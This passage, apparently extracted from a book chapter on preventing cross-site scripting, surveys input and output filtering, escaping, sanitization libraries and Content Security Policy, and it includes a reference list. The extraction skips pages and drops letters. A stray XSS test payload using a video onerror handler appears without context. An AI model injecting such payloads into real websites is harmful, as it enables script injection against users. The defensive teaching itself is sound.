t/customer/portal/articles/1783127-using-burp-scanner.
2. Cao, Y., Yegneswaran, V., Porras, P. A., & Chen, Y. (2012).
PathCutter: Severing the self-propagation path of XSS JavaScript
worms in social web networks. In NDSS.
3. Chaudhary, P., Gupta, B. B., & Gupta, S. (2019). A framework
for preserving the privacy of online users against XSS worms
on online social network. International Journal of Information
Technology and Web Engineering, 14(1), 85–111.
4. Chaudhary, P., Gupta, S., & Gupta, B. B. (2016). Auditing defense
against XSS worms in online social network-based web applica-
tions. In Handbook of Research on Modern Cryptographic Solutions
for Computer and Cyber Security (pp. 216–245). IGI Global.
5. Faghani, M. R., & Nguyen, U. T. (2013). A study of XSS worm
propagation and detection mechanisms in online social networks.
IEEE Transactions on Information Forensics and Security, 8(11),
1815–1826.
6. Faghani, M. R., & Saidi, H. (2009). Social networks’ XSS worms.
In Proceedings of the 12th IEEE International Conference on
Computational Science and Engineering (CSE'09). IEEE.
122 ◾ Cross-Site Scripting Attacks
XSS Preventive
Measures and
General Practices
6.1 INTRODUCTION
Until now, we have gone through much information that is suf-
fcient to understand the theory behind the XSS attack. From this,
we can extract the fact that this vulnerability is not going away
easily because there is a lack of support in majority of the tools,
125
126 ◾ Cross-Site Scripting Attacks
6.2.1 Filtering
Te root cause of the XSS (as discussed earlier) is the inappro-
priate input fltering [10, 14]. Mainly, the user can submit some
form of data to the web site through many ways such as using
form submission and message posting, or through advance meth-
ods like JSON, AJAX, XML, etc. As this is an untrusted infor-
mation entered by the user, it must not be processed in its raw
form as it may impose serious security implications like the XSS.
Tereby, the frst and foremost technique to prevent against an
XSS attack is fltering. It means the user’s entire untrusted data
must pass through a flter that flters out the harmful keywords
like <script> tag, HTML suspicious event handlers like onActi-
vate(), onClick(), JavaScript elements, style sheet tags, and so on.
Tere are two types of fltering that can be applied: input flter-
ing and output fltering. Input fltering is the same as discussed
earlier, i.e. removing of suspicious keywords form the entered
data, whereas output fltering is applied on data that is refected
back in the response web page. It basically works for the persistent
XSS attack. Nevertheless, every method has its limitations. Te
disadvantage of this technique is that it also removes legitimate
data if it matches with restricted keywords. To overcome this, the
flters need to be relaxed to include the necessary tags and ele-
ments, paving the way for hacker and attacker.
6.2.2 Escaping
Escaping or encoding is another method to prevent the XSS attack
[10, 15]. It works by restricting the malicious script code from
getting executed in the browser. It means the browser will treat
the user input data as data and will not execute anything related
to it. Terefore, if the attacker injects some illicit script code
XSS Preventive Measures and General Practices ◾ 129
then the browser will not run it, if escaping is applied properly.
Consequently, the user will remain unafected. Tere are many
types of encoding that can be applied to any web page. Let’s dis-
cuss each one of them.
• CSS Escaping: Style sheets can also be used for the injection
purposes. Terefore, this encoding uses \HH and &\HHHH
escaping format.
6.2.3 Sanitization
It is another technique in hand to prevent against the XSS attack
[7, 10]. It is basically a process of cleaning the data or sanitizing
the data to make it secure from suspicious HTML tags or elements
like <scripts>. It ensures that the entered data is in the same for-
mat that is expected to be received for that particular input feld
in the web site. It is required in the case where the site can accept
input from the user with diverse content including HTML tags
or style felds. So sanitizing the data is a must to eliminate the
harmful efects. Tere are several libraries or directives available
to perform sanitization like HtmlSanitizer by OWASP, Ruby on
Rails SanitizeHelper, DOMpurify, PHP HTML purifer, Python
Bleach, and many more.
the user with various code injection vulnerabilities like the XSS.
Hence, Mozilla proposed a security prototype named as Content
Security Policy (CSP) to mitigate various types of web applica-
tion security vulnerabilities like the XSS [1]. It allows a web site
developer to specify the location to retrieve the external resources
on the web. Terefore, the browser is allowed to access only those
resources that are whitelisted, ignoring all other domains of
resources. Consequently, the injected scripts won’t get executed
even if the attacker fnds a way to inject them into the web site.
However, it requires all the embedded JavaScript codes to be
shifed to a separate fle. Consequently, it demands modifcations
in the web application which is a tedious task for the large web
applications over the web. It also needs modifcation in both the
web site and the web browser.
<video><source onerror=”alert(1)”></video>
REFERENCES
1. Content security policy. [online] Available at: https://developer.mo
zilla.org/en-US/docs/Web/HTTP/CSP.
2. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles,
Algorithm, Applications, and Perspectives. CRC Press.
3. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5
code for halting the DOM-based XSS vulnerabilities in cloud.
International Journal of Cloud Applications and Computing, 7(1),
1–31.
4. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for
Computer and Cyber Security: Principle, Algorithms, and Practices.
CRC Press.
XSS Preventive Measures and General Practices ◾ 137
5. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sani-
tizer. In Handbook of Research on Securing Cloud-Based Databases
with Biometric Applications (pp. 174–191). IGI Global.
6. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for
HTML5‐based web applications against JavaScript code injec-
tion vulnerabilities. Security and Communication Networks, 9(11),
1477–1495.
7. Gupta, S., Gupta, B. B., & Chaudhary, P. (2018). A client‐server
JavaScript code rewriting-based framework to detect the XSS
worms from online social network. Concurrency and Computation:
Practice and Experience, 31(21), e4646.
8. Jiang, F., Fu, Y., Gupta, B. B., Lou, F., Rho, S., Meng, F., & Tian,
Z. (2018). Deep learning based multi-channel intelligent attack
detection for data security. IEEE Transactions on Sustainable
Computing.
9. Sarmah, U., Bhattacharyya, D. K., & Kalita, J. K. (2018). A sur-
vey of detection methods for XSS attacks. Journal of Network and
Computer Applications, 118, 113–143.
10. Seth, F., Jeremiah, G., Robert, H., Anton, R., & Petko, D. P. (2011).
XSS Attacks: Cross Site Scripting Exploits and Defense. Elsevier.
11. Stergiou, C., Psannis, K. E., Xiflidis, T., Plageras, A. P., & Gupta,
B. B. (2018, April). Security and privacy of big data for social
networking services in cloud. In IEEE INFOCOM 2018-IEEE
Conference on Computer Communications Workshops (INFOCOM
WKSHPS) (pp. 438–443). IEEE.
12. Taha, T. A., & Karabatak, M. (2018, March). A proposed approach
for preventing cross-site scripting. In 2018 6th International
Symposium on Digital Forensic and Security (ISDFS) (pp. 1–4).
IEEE.
13. White hat security report. [online] Available at: https://info.wh
itehatsec.com/rs/675-YBI-674/images/WHS%202017%20Applic
ation%20Security%20Report%20FINAL.pdf.
14. XSS flter evasion cheat sheet. [online] Available at: https://ww
w.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
15. XSS prevention cheat sheet. [online] Available at: https://cheatsh
eetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevent
ion_Cheat_Sheet.html.
Index